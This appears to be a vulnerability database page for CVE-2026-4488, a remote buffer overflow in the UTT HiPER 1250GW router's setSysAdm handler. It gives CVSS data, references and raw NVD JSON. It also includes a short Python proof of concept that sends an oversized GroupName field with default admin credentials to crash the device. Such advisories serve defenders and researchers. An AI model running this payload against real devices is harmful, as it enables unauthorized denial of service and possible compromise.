CVE-2026-4488

Description

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. Affected is the function strcpy of the file /goform/setSysAdm. Such manipulation of the argument GroupName leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UTT HiPER 1250GW <= 3.2.7-210907-180535

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Replace with actual IP)
target_url = "http://<TARGET_IP>/goform/setSysAdm"

# Malicious payload to trigger buffer overflow in 'GroupName' parameter
# Sending a pattern of 1000 'A' characters to overwrite the buffer
payload = {
    "GroupName": "A" * 1000,
    "UserName": "admin",
    "Password": "admin"
}

try:
    print("[+] Sending exploit payload to %s..." % target_url)
    # Sending POST request to the vulnerable endpoint
    response = requests.post(target_url, data=payload, timeout=5)
    
    # Check response status
    if response.status_code == 200:
        print("[!] Request sent, check device for crash or shell access.")
    else:
        print("[!] Device returned status code: %d" % response.status_code)
        
except requests.exceptions.RequestException as e:
    print("[-] An error occurred: %s" % e)
    print("[-] This might indicate the service has crashed (DoS).")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4488
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4488
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4488/
[4] VulDB https://vuldb.com/cve/CVE-2026-4488
[5] https://github.com/hmKunlun/UTTHiPER/blob/main/HiPER%201250GW.md
[6] https://vuldb.com/?ctiid.352011
[7] https://vuldb.com/?id.352011
[8] https://vuldb.com/?submit.773565

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4488", "sourceIdentifier": "[email protected]", "published": "2026-03-20T16:16:19.093", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. Affected is the function strcpy of the file /goform/setSysAdm. Such manipulation of the argument GroupName leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en UTT HiPER 1250GW hasta 3.2.7-210907-180535. Afectada es la función strcpy del archivo /goform/setSysAdm. Dicha manipulación del argumento GroupName conduce a desbordamiento de búfer. Es posible lanzar el ataque de forma remota. El exploit está disponible públicamente y podría ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://github.com/hmKunlun/UTTHiPER/blob/main/HiPER%201250GW.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.352011", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.352011", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.773565", "source": "[email protected]"}]}}